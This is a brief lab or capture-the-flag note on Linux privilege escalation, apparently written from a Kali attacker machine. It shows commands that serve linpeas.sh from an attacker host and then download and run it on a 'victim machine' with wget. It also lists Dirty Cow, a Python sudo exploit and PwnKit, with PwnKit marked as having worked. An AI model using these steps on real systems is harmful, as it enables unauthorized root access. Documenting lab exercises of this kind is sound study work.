Privilege escalation [Got] [Own]
# in kali linux
python3 -m http.server 80 -d $(dirname $(locate linpeas.sh))
# in victim machine
cd /tmp
wget http://192.168.45.219/linpeas.sh
chmod a+x linpeas.sh
./linpeas.sh









Trying Dirty Cow Exploit
Trying Python sudo exploit.

Trying Pwnkit vulnerability [Worked]

Last updated